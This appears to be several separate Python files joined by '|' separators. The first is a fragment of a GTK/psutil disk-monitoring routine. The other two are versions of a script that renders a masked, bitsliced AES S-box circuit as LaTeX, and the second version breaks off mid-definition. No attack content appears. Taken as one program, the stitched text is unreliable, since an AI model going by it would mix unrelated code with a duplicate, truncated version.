            if self.disklist[i] in part[0]:
                self.diskPartitions[i]+=[part]
        # ListStore for the treeview of disk storage
        self.diskListStores[i]=g.ListStore(str,str,str,str,str,int,bool)
        self.diskListStoreItrs[i]=[]  # list of iterators for each row for a disk
        # Storing the values in the list stores
        for part in self.diskPartitions[i]:
            temp=ps.disk_usage(part[1])
            itr=self.diskListStores[i].append([part[0],part[1],part[2],byte_to_human(temp[0],persec=False),byte_to_human(temp[1],persec=False),temp[3],False])
            self.diskListStoreItrs[i].append(itr)
        # Setting the model (liststore) for the treeview
        self.diskWidgetList[i].diskUsagesTreeView.set_model(self.diskListStores[i])
        # Iterating for making each column in the disk treeview
        for k,col in enumerate(['Device','MountPoint','Type','Total','Used']):
            # Text renderer
            renderer=g.CellRendererText()
            # Creating a column and assigning additional properties based on type
            if col=='Used':
                # 'Used' shows both the human-readable text and a progress bar
                column=g.TreeViewColumn(col)
                progRenderer=g.CellRendererProgress()
                column.pack_start(renderer,False)
                column.add_attribute(renderer,"text",4)
                column.pack_start(progRenderer,False)
                column.add_attribute(progRenderer,"value",5)
            else:
                column=g.TreeViewColumn(col,renderer,text=k)
            # Making each column sortable, resizable, and reorderable
            column.set_sort_column_id(k)
            column.set_resizable(True)
            column.set_reorderable(True)
            column.set_alignment(0)
            column.set_sort_indicator(True)
            # Appending the column to the disk treeview
            self.diskWidgetList[i].diskUsagesTreeView.append_column(column)
        # Setting the custom sorting function for column 3 (used column)
        self.diskListStores[i].set_sort_func(3,sorting_func,3)
        # Data-holding history arrays (100 samples each)
        self.diskActiveArray.append([0]*100)
        self.diskReadArray.append([0]*100)
        self.diskWriteArray.append([0]*100)
        # Providing the data to the disk tab widget class
        self.diskWidgetList[i].givedata(self,i)
def diskTabUpdate(self):
    """
    Function to periodically update DISKs statistics.

    Computes deltas against the previous psutil snapshot, refreshes the
    per-partition tree views and speed labels, and shifts the new samples
    into the 100-entry history arrays consumed by the draw callbacks.
    """
    # Per-disk I/O counters; each value is a psutil namedtuple with fields
    # (read_count, write_count, read_bytes, write_bytes, read_time,
    #  write_time, read_merged_count, write_merged_count, busy_time).
    # NOTE: the original annotation `dict(read_count, ...)` was not a valid
    # type expression; plain `dict` is used instead.
    disktemp: dict = ps.disk_io_counters(perdisk=True)
    self.diskt2=time()
    # Time elapsed since the previous update
    timediskDiff=self.diskt2-self.diskt1
    # Array for the current state
    self.diskstate2=[]
    # Updating the disk storage tree view (partitions)
    for i in range(0,self.numOfDisks):
        try:
            # New disk I/O state
            self.diskstate2.append(disktemp[self.disklist[i]])
            for j,part in enumerate(self.diskPartitions[i]):
                temp=ps.disk_usage(part[1])
                self.diskListStores[i].set(self.diskListStoreItrs[i][j],3,byte_to_human(temp[0],persec=False),4,byte_to_human(temp[1],persec=False),5,temp[3])
        except Exception as e:
            print(f"error in diskliststore: {e}")
    # Holds the per-disk active (utilisation) percentage strings
    self.diskActiveString=[]
    for i in range(0,self.numOfDisks):
        try:
            # Difference between current and previous disk state:
            # [read bytes, write bytes, busy time (ms)]
            diskDiff: list =[self.diskstate2[i].read_bytes-self.diskstate1[i].read_bytes
                ,self.diskstate2[i].write_bytes-self.diskstate1[i].write_bytes
                ,self.diskstate2[i].busy_time-self.diskstate1[i].busy_time]
            # Disk active (utilisation) percentage: busy ms / elapsed ms * 100
            active_percetage=int(diskDiff[2]/(10*timediskDiff))
            if active_percetage>100: active_percetage=100
            self.diskActiveString.append(f'{active_percetage}%')
            # Setting the info labels; 1024*1024=1048576 for MiB conversion
            self.diskWidgetList[i].diskactivelabelvalue.set_text(self.diskActiveString[i])
            self.diskWidgetList[i].diskreadlabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[0]/(timediskDiff*1048576)))
            self.diskWidgetList[i].diskwritelabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[1]/(timediskDiff*1048576)))
            # Updating the sample-holding arrays depending on the direction;
            # truthy means newest sample on the right
            if self.update_graph_direction:
                self.diskActiveArray[i].pop(0)
                self.diskActiveArray[i].append((diskDiff[2])/(10*timediskDiff))
                self.diskReadArray[i].pop(0)
                self.diskReadArray[i].append(diskDiff[0]/(timediskDiff*1048576))
                self.diskWriteArray[i].pop(0)
                self.diskWriteArray[i].append(diskDiff[1]/(timediskDiff*1048576))
            else:
                self.diskActiveArray[i].pop()
                self.diskActiveArray[i].insert(0,(diskDiff[2])/(10*timediskDiff))
                self.diskReadArray[i].pop()
                self.diskReadArray[i].insert(0,diskDiff[0]/((timediskDiff)*1048576))
                self.diskWriteArray[i].pop()
                self.diskWriteArray[i].insert(0,diskDiff[1]/((timediskDiff)*1048576))
            # Passing data to the disk tab widget class
            self.diskWidgetList[i].givedata(self,i)
        except Exception as e:
            print(f'error in disk update: {e}')
    # The current state/time becomes the previous one for the next update
    self.diskstate1=self.diskstate2
    self.diskt1=self.diskt2
|
#! /usr/bin/python3
# Copyright 2018 Gaëtan Cassiers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Export AES S-Box computation graph with cut edges to a LaTeX representation.
"""
import re
import networkx as nx
import parse
import graph_tools
from utils import draw_graph
# Middle (non-linear) layer of the bitsliced AES S-box as a raw netlist.
s = open('repr_aes_bitslice/non_lin.txt').read()
# Bottom linear layer; its input nodes are the outputs of the middle layer.
s_out = open('repr_aes_bitslice/lin_out.txt').read()
g_out = parse.parse_string_graph(s_out)
out_nodes = set(g_out.nodes)
# Parse the middle layer, tagging as outputs the nodes the bottom layer reads.
g = parse.parse(s, tag_output_fn=lambda g, n: n in out_nodes)
# Insert explicit split (fan-out) nodes; maps original node -> its split copies.
split_c_d = graph_tools.add_split_nodes(g)
split_c = list(split_c_d.values())
# Edges of the (split-augmented) graph on which a mask refresh is inserted.
# Each entry is (source node, destination node, edge key).
cut_edges = [
    ('y11s0', 'z6', 0), ('t40s2', 'z13', 0), ('t23s1', 't34', 0), ('y1s0', 't8', 0), ('t41s2', 'z17', 0), ('y5', 'y5s1', 0),
    ('y2', 'y2s1', 0), ('t24s3', 't27', 0), ('t16s0', 't18', 0), ('t29s4', 't39', 0), ('y17s0', 'z7', 0), ('t7s0', 't11', 0),
    ('t29s0', 'z5', 0), ('t44s0', 'z0', 0), ('z8', 'o8', 0), ('y4', 'y4s1', 0), ('t33s2', 't44', 0), ('y12', 'y12s1', 0),
    ('y15', 'y15s1', 0), ('t29', 't29s4', 0), ('t33s3', 't35', 0), ('t29s1', 't43', 0), ('t33s0', 't34', 0), ('y4s0', 'z11', 0),
    ('t25s1', 't40', 0), ('t41s1', 'z17', 0), ('t29s0', 't42', 0), ('t33s5', 'z11', 0), ('z9', 'o9', 0), ('y12s0', 'z9', 0),
    ('y3s0', 't3', 0), ('y10s0', 'z8', 0), ('t41s2', 't45', 0), ('t37s3', 't44', 0), ('y17', 'y17s1', 0), ('t24s2', 't33', 0),
    ('t33s1', 't34', 0), ('t37s0', 't41', 0), ('t22', 't22s2', 0), ('z12', 'o12', 0), ('t33s5', 't42', 0), ('y3', 'y3s1', 0),
    ('t37s2', 't44', 0), ('t42s2', 't45', 0), ('y10s0', 't15', 0), ('t33s4', 't35', 0), ('t29s0', 'z14', 0), ('y4s0', 't5', 0),
    ('t40s1', 't41', 0), ('t33s4', 't44', 0), ('t33s5', 'z2', 0), ('y7s0', 'z5', 0), ('t33s2', 'z2', 0), ('t40s2', 'z4', 0),
    ('y8s0', 't15', 0), ('t29s1', 't42', 0), ('y17s0', 't13', 0), ('t29s3', 't43', 0), ('t45s0', 'z7', 0), ('t42s1', 'z6', 0),
    ('y9s0', 't12', 0), ('t26s0', 't27', 0), ('t33s1', 't44', 0), ('t2s0', 't6', 0), ('t40s0', 'z4', 0), ('t23s0', 't26', 0),
    ('y3s0', 'z10', 0), ('t37s0', 'z1', 0), ('t41s0', 't45', 0), ('t14s0', 't17', 0), ('t33s3', 't44', 0), ('t37s2', 'z10', 0),
    ('t24s2', 't27', 0), ('t33s3', 't42', 0), ('y13s0', 'z12', 0), ('y12s0', 't2', 0), ('y7s0', 't10', 0), ('y13s0', 't7', 0),
    ('t33s2', 't42', 0), ('z6', 'o6', 0), ('y2s0', 't10', 0), ('t14s0', 't19', 0), ('z16', 'o16', 0), ('t22s1', 't29', 0),
    ('t33s0', 'z11', 0), ('z3', 'o3', 0), ('t41s2', 'z8', 0), ('t23s0', 't30', 0), ('t23s0', 't34', 0), ('t33s3', 'z2', 0),
    ('t29s2', 't42', 0), ('t27s1', 't38', 0), ('t42s1', 'z15', 0), ('t29s2', 't43', 0), ('t40', 't40s3', 0), ('t42s0', 't45', 0),
    ('t36', 't36s1', 0), ('t29s1', 'z5', 0), ('y7', 'y7s1', 0), ('y5s0', 'z13', 0), ('t27s1', 't35', 0), ('t27s0', 't28', 0),
    ('t40s1', 't43', 0), ('t24s0', 't36', 0), ('z7', 'o7', 0), ('t40s2', 't41', 0), ('y1', 'y1s1', 0), ('t43s1', 'z12', 0),
    ('t29s2', 'z5', 0), ('t27s2', 't35', 0), ('t33s3', 'z11', 0), ('t36s0', 't38', 0), ('y16s0', 'z3', 0), ('t40s2', 't43', 0),
    ('t33s5', 't44', 0), ('t29s3', 't42', 0), ('t33s4', 't42', 0), ('t29', 't29s2', 0), ('z4', 'o4', 0), ('y15s0', 't2', 0),
    ('y5s0', 't8', 0), ('x7', 'x7s1', 0), ('t37', 't37s3', 0), ('t24s3', 't30', 0), ('t33s2', 't35', 0), ('t37s2', 'z1', 0),
    ('t33s4', 'z11', 0), ('t33s1', 'z2', 0), ('t33s1', 't35', 0), ('x7s0', 'z2', 0), ('t42', 't42s0', 0), ('t12s0', 't14' , 0),
    ('t12s1', 't16', 0), ('t40s1', 'z4', 0), ('t42s2', 'z6', 0), ('t44', 't44s1', 0), ('t37s1', 'z1', 0), ('y16s0', 't7', 0),
    ('t25s0', 't28', 0), ('t33s2', 'z11', 0), ('t29s3', 'z14', 0), ('t44s1', 'z9', 0), ('t33s4', 'z2', 0), ('y8', 'y8s1', 0),
    ('t24s1', 't36', 0), ('t29s0', 't43', 0), ('t24', 't24s1', 0), ('y14s0', 'z16', 0), ('t43s0', 'z3', 0), ('t27s1', 't28', 0),
    ('y14s0', 't13', 0), ('y2s0', 'z14', 0), ('t40s0', 'z13', 0), ('t24s3', 't33', 0), ('y9s0', 'z15', 0), ('t23s1', 't30', 0),
    ('t41s0', 'z8', 0), ('t33s5', 't35', 0), ('y9', 'y9s1', 0), ('t29s3', 'z5', 0), ('t24s0', 't33', 0), ('t22s0', 't31', 0),
    ('t40s0', 't41', 0), ('y1s0', 'z4', 0), ('t26', 't26s1', 0), ('y15s0', 'z0', 0), ('t7s0', 't9', 0), ('x7s0', 't5', 0),
    ('t29s3', 't39', 0), ('t42s2', 'z15', 0), ('y16', 'y16s1', 0), ('t37s2', 't41', 0), ('t24s3', 't36', 0), ('t37s0', 'z10', 0),
    ('t33s3', 't34', 0), ('y14', 'y14s1', 0), ('y13', 'y13s1', 0), ('t33s4', 't34', 0), ('t29s1', 'z14', 0), ('t24s2', 't30', 0),
    ('y8s0', 'z17', 0), ('t37s1', 't41', 0), ('y6s0', 'z1', 0), ('t22s2', 't29', 0), ('t24s0', 't30', 0), ('y11', 'y11s1', 0),
    ('y10', 'y10s1', 0), ('t26s0', 't31', 0), ('t22s1', 't25', 0), ('t2s0', 't4', 0), ('t21', 't21s1', 0), ('t37s3', 'z10', 0),
    ('t33', 't33s0', 0), ('t24s0', 't27', 0), ('t33s2', 't34', 0), ('t27s2', 't38', 0), ('t21s0', 't26', 0), ('t40s1', 'z13', 0),
    ('y11s0', 't12', 0), ('t29s0', 't39', 0), ('t37s1', 't44', 0), ('t40s0', 't43', 0), ('t16s1', 't20', 0), ('t33s1', 't42', 0),
    ('t29s1', 't39', 0), ('y6', 'y6s1', 0), ('z10', 'o10', 0), ('t22s1', 't31', 0), ('t32', 't33', 0), ('t29s4', 'z14', 0),
    ('t22s0', 't25', 0), ('t23s1', 't26', 0), ('t21s0', 't25', 0), ('z17', 'o17', 0), ('t36s0', 't37', 0), ('t45s0', 'z16', 0),
    ('y6s0', 't3', 0)]
# Sanity check: no malformed node names (stray spaces) in the cut set.
nok = [x for x in cut_edges if ' ' in x[0]+x[1]]
assert not nok, nok
print(len(cut_edges))
def rename_split(g, cut, split_c_d):
    """Build a rename map for split nodes still present in *g*.

    For every base node in *split_c_d*, its split copies that survive in
    ``g.nodes`` are renamed ``'<base>s<i>'`` in order of appearance.
    (*cut* is accepted for interface compatibility but not used.)
    """
    present = g.nodes
    mapping = {}
    for base, candidates in split_c_d.items():
        kept = [node for node in candidates if node in present]
        for idx, node in enumerate(kept):
            mapping[node] = f'{base}s{idx}'
    return mapping
def export_graph(g, cut, split_c_d):
    """Yield one LaTeX assignment line per node of *g* in topological order.

    Operands whose incoming edge is in *cut* are wrapped in ``\\refresh(...)``.
    Split nodes are renamed via :func:`rename_split` before formatting.

    Raises
    ------
    ValueError : if a node has more than two predecessors.
    """
    cut = {(x, y) for x, y, *_ in cut}
    rename = rename_split(g, cut, split_c_d)
    def mn(n):
        # Mapped name: renamed split node, or the node itself.
        return rename.get(n, n)
    def test_refresh(src, dest):
        # Wrap the operand when the edge src->dest is a refresh point.
        return f"\\refresh({format_var(mn(src))})" if (src, dest) in cut else format_var(mn(src))
    for n in nx.topological_sort(g):
        pred = list(g.predecessors(n))
        if len(pred) == 0:
            # Inputs carry no operation.  NOTE: the original message reused
            # double quotes inside a double-quoted f-string, a SyntaxError
            # before Python 3.12 (PEP 701); single quotes fix it.
            assert 'op' not in g.nodes[n], f"{n}, {g.nodes[n]['op']}"
        elif len(pred) == 1:
            # Plain copy (possibly refreshed).
            assert 'op' not in g.nodes[n], f"{n}, {g.nodes[n]['op']}"
            yield format_var(mn(n)) + "=" + test_refresh(pred[0], n)
        elif len(pred) == 2:
            # Binary gate: emit "dest = o1 <op> o2" with '*' as \cdot.
            op = g.nodes[n]['op']
            o1 = test_refresh(pred[0], n)
            o2 = test_refresh(pred[1], n)
            op = op.replace('*', r'\cdot')
            yield format_var(mn(n)) + " = " + o1 + f' {op} ' + o2
        else:
            raise ValueError(f"{n}, {pred}")
def format_var(l):
    """Render a flat variable name such as ``'t40s2'`` as LaTeX ``'t_{40,2}'``.

    The name is letter + index + optional share tag (a letter) + share index;
    when a share tag is present the share index joins the subscript after a
    comma, otherwise the subscript is the index alone.
    """
    match = re.match(r'([a-z])([0-9]+)([a-z]?)([0-9]*)', l)
    assert match, l
    letter, index, share_tag, share_idx = match.groups()
    if share_tag:
        subscript = index + ',' + share_idx
    else:
        subscript = index
    return letter + '_{' + subscript + '}'
def format_assign(l):
    """Translate one netlist assignment line into a LaTeX math row.

    Negated assignments (``d=not(a<op>b)``) are parsed with a local regex and
    wrapped in ``\\lognot(...)``; other lines go through
    ``parse.parse_assignment``.  ``'*'`` renders as ``\\cdot``.  The result is
    wrapped in ``$...$`` and terminated with a LaTeX line break.
    """
    simple = r'[a-z][0-9]+'
    if 'not' in l:
        m = re.match(rf'({simple})=not\(({simple})(\*|\+)({simple})\)', l)
        assert m, l
        dest, src1, op, src2 = m.groups()
        wrap_open, wrap_close = '\\lognot(', ')'
    else:
        dest, op, (src1, src2) = parse.parse_assignment(l)
        wrap_open, wrap_close = '', ''
    op = op.replace('*', r'\cdot')
    body = (format_var(dest) + ' = ' + wrap_open + format_var(src1)
            + f' {op} ' + format_var(src2) + wrap_close)
    return f'${body}$ \\\\'
def sort_assign(l):
    """Sort LaTeX assignment rows like ``'$x_{12,3}$ ...'``.

    Ordering is by variable letter, then numeric index, then a normalized
    share suffix (``','`` -> ``'z'`` and ``'}'`` -> ``'a'`` so un-shared
    variables sort before their shares).
    """
    def sort_key(line):
        # Drop the leading '$'; the layout is then X_{DD...}
        body = line[1:]
        digits = ''.join(ch for ch in body[3:5] if ch.isdigit())
        suffix = body[5:].replace(',', 'z').replace('}', 'a')
        return (body[0], int(digits), suffix)
    return sorted(l, key=sort_key)
# Drop split nodes made unnecessary by the chosen cut, and remap the cut
# edges onto the simplified graph.
g4, simplified_cut_edges = graph_tools.without_unncessary_splits(g, cut_edges, split_c_d)
print(len(simplified_cut_edges))
# Middle-layer assignments, rendered and sorted.
exp = list(export_graph(g4, simplified_cut_edges, split_c_d))
exp = sort_assign(f'${x}$ \\\\' for x in exp)
exp_old = exp
# Regroup by variable family: inputs (x), shared terms (y), intermediates (t),
# layer outputs (z), tagged outputs (o).
exp = (
    [x for x in exp if x.startswith('$x')] +
    [x for x in exp if x.startswith('$y')] +
    [x for x in exp if x.startswith('$t')] +
    [x for x in exp if x.startswith('$z')] +
    [x for x in exp if x.startswith('$o')]
)
# Top and bottom linear layers come straight from the netlist files; the
# bottom layer's z names are rewritten to o to match the middle layer.
s_in = open('repr_aes_bitslice/lin_in.txt').read()
s_out = open('repr_aes_bitslice/lin_out_not.txt').read()
s_out = s_out.replace('z', 'o')
exp_out = sort_assign(map(format_assign, s_out.splitlines()))
exp_out = (
    [x for x in exp_out if x.startswith('$t')] +
    [x for x in exp_out if x.startswith('$s')]
)
# Assemble the three multicols blocks (top linear, middle non-linear,
# bottom linear) and print the final LaTeX to stdout.
s = (
    '\\begin{multicols}{5}\n' +
    '[Top linear layer\n]\n' +
    r'\noindent' +
    '\n'.join(sort_assign(map(format_assign, s_in.splitlines()))) + '\n' +
    '\\end{multicols}\n\n' +
    '\\begin{multicols}{5}\n' +
    '[Middle non-linear layer\n]\n' +
    r'\noindent' +
    '\n'.join(exp) + '\n' +
    '\\end{multicols}\n\n' +
    '\\begin{multicols}{5}\n' +
    '[Bottom linear layer\n]\n' +
    r'\noindent' +
    '\n'.join(exp_out) + '\n' +
    '\\end{multicols}\n'
)
print(s)
| #! /usr/bin/python3
# Copyright 2018 Gaëtan Cassiers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Export AES S-Box computation graph with cut edges to a LaTeX representation.
"""
import re
import networkx as nx
import parse
import graph_tools
from utils import draw_graph
# Load the non-linear (middle) layer and the bottom linear layer of the
# bitsliced AES S-box circuit from their textual representations.
s = open('repr_aes_bitslice/non_lin.txt').read()
s_out = open('repr_aes_bitslice/lin_out.txt').read()
g_out = parse.parse_string_graph(s_out)
# Nodes of the bottom linear layer; a middle-layer node feeding one of
# these is tagged as an output of the non-linear computation graph.
out_nodes = set(g_out.nodes)
g = parse.parse(s, tag_output_fn=lambda g, n: n in out_nodes)
# Insert explicit split (fan-out) nodes.  split_c_d presumably maps each
# original node to the list of split copies created for it -- see
# graph_tools.add_split_nodes for the exact contract (TODO confirm).
split_c_d = graph_tools.add_split_nodes(g)
split_c = list(split_c_d.values())
cut_edges = [
('y11s0', 'z6', 0), ('t40s2', 'z13', 0), ('t23s1', 't34', 0), ('y1s0', 't8', 0), ('t41s2', 'z17', 0), ('y5', 'y5s1', 0),
('y2', 'y2s1', 0), ('t24s3', 't27', 0), ('t16s0', 't18', 0), ('t29s4', 't39', 0), ('y17s0', 'z7', 0), ('t7s0', 't11', 0),
('t29s0', 'z5', 0), ('t44s0', 'z0', 0), ('z8', 'o8', 0), ('y4', 'y4s1', 0), ('t33s2', 't44', 0), ('y12', 'y12s1', 0),
('y15', 'y15s1', 0), ('t29', 't29s4', 0), ('t33s3', 't35', 0), ('t29s1', 't43', 0), ('t33s0', 't34', 0), ('y4s0', 'z11', 0),
('t25s1', 't40', 0), ('t41s1', 'z17', 0), ('t29s0', 't42', 0), ('t33s5', 'z11', 0), ('z9', 'o9', 0), ('y12s0', 'z9', 0),
('y3s0', 't3', 0), ('y10s0', 'z8', 0), ('t41s2', 't45', 0), ('t37s3', 't44', 0), ('y17', 'y17s1', 0), ('t24s2', 't33', 0),
('t33s1', 't34', 0), ('t37s0', 't41', 0), ('t22', 't22s2', 0), ('z12', 'o12', 0), ('t33s5', 't42', 0), ('y3', 'y3s1', 0),
('t37s2', 't44', 0), ('t42s2', 't45', 0), ('y10s0', 't15', 0), ('t33s4', 't35', 0), ('t29s0', 'z14', 0), ('y4s0', 't5', 0),
('t40s1', 't41', 0), ('t33s4', 't44', 0), ('t33s5', 'z2', 0), ('y7s0', 'z5', 0), ('t33s2', 'z2', 0), ('t40s2', 'z4', 0),
('y8s0', 't15', 0), ('t29s1', 't42', 0), ('y17s0', 't13', 0), ('t29s3', 't43', 0), ('t45s0', 'z7', 0), ('t42s1', 'z6', 0),
('y9s0', 't12', 0), ('t26s0', 't27', 0), ('t33s1', 't44', 0), ('t2s0', 't6', 0), ('t40s0', 'z4', 0), ('t23s0', 't26', 0),
('y3s0', 'z10', 0), ('t37s0', 'z1', 0), ('t41s0', 't45', 0), ('t14s0', 't17', 0), ('t33s3', 't44', 0), ('t37s2', 'z10', 0),
('t24s2', 't27', 0), ('t33s3', 't42', 0), ('y13s0', 'z12', 0), ('y12s0', 't2', 0), ('y7s0', 't10', 0), ('y13s0', 't7', 0),
('t33s2', 't42', 0), ('z6', 'o6', 0), ('y2s0', 't10', 0), ('t14s0', 't19', 0), ('z16', 'o16', 0), ('t22s1', 't29', 0),
('t33s0', 'z11', 0), ('z3', 'o3', 0), ('t41s2', 'z8', 0), ('t23s0', 't30', 0), ('t23s0', 't34', 0), ('t33s3', 'z2', 0),
('t29s2', 't42', 0), ('t27s1', 't38', 0), ('t42s1', 'z15', 0), ('t29s2', 't43', 0), ('t40', 't40s3', 0), ('t42s0', 't45', 0),
('t36', 't36s1', 0), ('t29s1', 'z5', 0), ('y7', 'y7s1', 0), ('y5s0', 'z13', 0), ('t27s1', 't35', 0), ('t27s0', 't28', 0),
('t40s1', 't43', 0), ('t24s0', 't36', 0), ('z7', 'o7', 0), ('t40s2', 't41', 0), ('y1', 'y1s1', 0), ('t43s1', 'z12', 0),
('t29s2', 'z5', 0), ('t27s2', 't35', 0), ('t33s3', 'z11', 0), ('t36s0', 't38', 0), ('y16s0', 'z3', 0), ('t40s2', 't43', 0),
('t33s5', 't44', 0), ('t29s3', 't42', 0), ('t33s4', 't42', 0), ('t29', 't29s2', 0), ('z4', 'o4', 0), ('y15s0', 't2', 0),
('y5s0', 't8', 0), ('x7', 'x7s1', 0), ('t37', 't37s3', 0), ('t24s3', 't30', 0), ('t33s2', 't35', 0), ('t37s2', 'z1', 0),
('t33s4', 'z11', 0), ('t33s1', 'z2', 0), ('t33s1', 't35', 0), ('x7s0', 'z2', 0), ('t42', 't42s0', 0), ('t12s0', 't14' , 0),
('t12s1', 't16', 0), ('t40s1', 'z4', 0), ('t42s2', 'z6', 0), ('t44', 't44s1', 0), ('t37s1', 'z1', 0), ('y16s0', 't7', 0),
('t25s0', 't28', 0), ('t33s2', 'z11', 0), ('t29s3', 'z14', 0), ('t44s1', 'z9', 0), ('t33s4', 'z2', 0), ('y8', 'y8s1', 0),
('t24s1', 't36', 0), ('t29s0', 't43', 0), ('t24', 't24s1', 0), ('y14s0', 'z16', 0), ('t43s0', 'z3', 0), ('t27s1', 't28', 0),
('y14s0', 't13', 0), ('y2s0', 'z14', 0), ('t40s0', 'z13', 0), ('t24s3', 't33', 0), ('y9s0', 'z15', 0), ('t23s1', 't30', 0),
('t41s0', 'z8', 0), ('t33s5', 't35', 0), ('y9', 'y9s1', 0), ('t29s3', 'z5', 0), ('t24s0', 't33', 0), ('t22s0', 't31', 0),
('t40s0', 't41', 0), ('y1s0', 'z4', 0), ('t26', 't26s1', 0), ('y15s0', 'z0', 0), ('t7s0', 't9', 0), ('x7s0', 't5', 0),
('t29s3', 't39', 0), ('t42s2', 'z15', 0), ('y16', 'y16s1', 0), ('t37s2', 't41', 0), ('t24s3', 't36', 0), ('t37s0', 'z10', 0),
('t33s3', 't34', 0), ('y14', 'y14s1', 0), ('y13', 'y13s1', 0), ('t33s4', 't34', 0), ('t29s1', 'z14', 0), ('t24s2', 't30', 0),
('y8s0', 'z17', 0), ('t37s1', 't41', 0), ('y6s0', 'z1', 0), ('t22s2', 't29', 0), ('t24s0', 't30', 0), ('y11', 'y11s1', 0),
('y10', 'y10s1', 0), ('t26s0', 't31', 0), ('t22s1', 't25', 0), ('t2s0', 't4', 0), ('t21', 't21s1', 0), ('t37s3', 'z10', 0),
('t33', 't33s0', 0), ('t24s0', 't27', 0), ('t33s2', 't34', 0), ('t27s2', 't38', 0), ('t21s0', 't26', 0), ('t40s1', 'z13', 0),
('y11s0', 't12', 0), ('t29s0', 't39', 0), ('t37s1', 't44', 0), ('t40s0', 't43', 0), ('t16s1', 't20', 0), ('t33s1', 't42', 0),
('t29s1', 't39', 0), ('y6', 'y6s1', 0), ('z10', 'o10', 0), ('t22s1', 't31', 0), ('t32', 't33', 0), ('t29s4', 'z14', 0),
('t22s0', 't25', 0), ('t23s1', 't26', 0), ('t21s0', 't25', 0), ('z17', 'o17', 0), ('t36s0', 't37', 0), ('t45s0', 'z16', 0),
('y6s0', 't3', 0)]
# Sanity check: a stray space in a node name would indicate a typo in the
# hand-maintained cut_edges list above.
nok = [x for x in cut_edges if ' ' in x[0]+x[1]]
assert not nok, nok
print(len(cut_edges))
def rename_split(g, cut, split_c_d):
    """Return a mapping from each split node still present in *g* to its
    canonical name '<base>s<i>', numbering the surviving splits of each
    base node in their original order.

    *cut* is unused but kept for signature compatibility with callers.
    """
    node_set = g.nodes
    return {
        member: f'{base}s{idx}'
        for base, members in split_c_d.items()
        for idx, member in enumerate([m for m in members if m in node_set])
    }
def export_graph(g, cut, split_c_d):
    """Yield one LaTeX-formatted assignment per node of *g*, in topological
    order, wrapping operands that cross a cut edge in \\refresh(...)."""
    cut_pairs = {(src, dst) for src, dst, *_ in cut}
    renamed = rename_split(g, cut_pairs, split_c_d)

    def label(node):
        # LaTeX name of a node, using its canonical split name when renamed.
        return format_var(renamed.get(node, node))

    def operand(src, dst):
        # Operands crossing a cut edge are wrapped in a refresh gadget.
        return f"\\refresh({label(src)})" if (src, dst) in cut_pairs else label(src)

    for node in nx.topological_sort(g):
        preds = list(g.predecessors(node))
        if len(preds) == 0:
            # Inputs carry no operation and produce no row.
            assert 'op' not in g.nodes[node], f"{node}, {g.nodes[node]['op']}"
        elif len(preds) == 1:
            # Plain copy (split output); still subject to refresh on cut edges.
            assert 'op' not in g.nodes[node], f"{node}, {g.nodes[node]['op']}"
            yield label(node) + "=" + operand(preds[0], node)
        elif len(preds) == 2:
            op = g.nodes[node]['op'].replace('*', r'\cdot')
            yield label(node) + " = " + operand(preds[0], node) + f' {op} ' + operand(preds[1], node)
        else:
            raise ValueError(f"{node}, {preds}")
def format_var(l):
    """Turn a flat variable name like 'y11s0' into LaTeX subscript form
    'y_{11,0}': letter, numeric index, optional share suffix."""
    match = re.match(r'([a-z])([0-9]+)([a-z]?)([0-9]*)', l)
    assert match, l
    letter, index, share_tag, share_idx = match.groups()
    # Only the share number survives; the tag letter ('s') is dropped.
    suffix = f',{share_idx}' if share_tag else ''
    return f'{letter}_{{{index}{suffix}}}'
def format_assign(l):
    """Render one textual assignment (e.g. 't1=a1*b2' or 'z0=not(a1+b2)')
    as a LaTeX math row terminated by a line break."""
    if 'not' in l:
        # Negated form: dest=not(src1 OP src2); parsed directly with a regex.
        re_var_simple = r'[a-z][0-9]+'
        match = re.match(f'({re_var_simple})=not\\(({re_var_simple})(\\*|\\+)({re_var_simple})\\)', l)
        assert match, l
        dest, src1, op, src2 = match.groups()
        op = op.replace('*', r'\cdot')
        body = format_var(dest) + ' = \\lognot(' + format_var(src1) + f' {op} ' + format_var(src2) + ')'
    else:
        dest, op, (src1, src2) = parse.parse_assignment(l)
        op = op.replace('*', r'\cdot')
        body = format_var(dest) + ' = ' + format_var(src1) + f' {op} ' + format_var(src2)
    return f'${body}$ \\\\'
def sort_assign(l):
    """Sort LaTeX rows of the shape '$v_{NN...}$ \\\\' by variable letter,
    numeric index, then share suffix (',' and '}' are remapped so the
    suffix ordering behaves sensibly)."""
    def sort_key(row):
        body = row[1:]  # drop the leading '$'
        index = int(''.join(ch for ch in body[3:5] if ch.isdigit()))
        tail = body[5:].replace(',', 'z').replace('}', 'a')
        return (body[0], index, tail)
    return sorted(l, key=sort_key)
# Drop split nodes made unnecessary by the chosen cut, then render the
# middle (non-linear) layer as sorted, grouped LaTeX rows.
# Fixes vs. previous version: removed the unused `exp_old` binding and
# closed the input files via context managers instead of leaking handles.
g4, simplified_cut_edges = graph_tools.without_unncessary_splits(g, cut_edges, split_c_d)
print(len(simplified_cut_edges))
exp = sort_assign(f'${x}$ \\\\' for x in export_graph(g4, simplified_cut_edges, split_c_d))
# Group rows by leading variable letter: inputs (x), y's, temporaries (t),
# z's, outputs (o) -- same order as the original concatenated filters.
exp = [row for prefix in ('$x', '$y', '$t', '$z', '$o') for row in exp if row.startswith(prefix)]

# Top linear layer comes straight from its textual description; the bottom
# layer uses the 'not' variant with z renamed to o to match the middle layer.
with open('repr_aes_bitslice/lin_in.txt') as f:
    s_in = f.read()
with open('repr_aes_bitslice/lin_out_not.txt') as f:
    s_out = f.read().replace('z', 'o')
exp_out = sort_assign(map(format_assign, s_out.splitlines()))
exp_out = [row for prefix in ('$t', '$s') for row in exp_out if row.startswith(prefix)]

def _layer(title, rows):
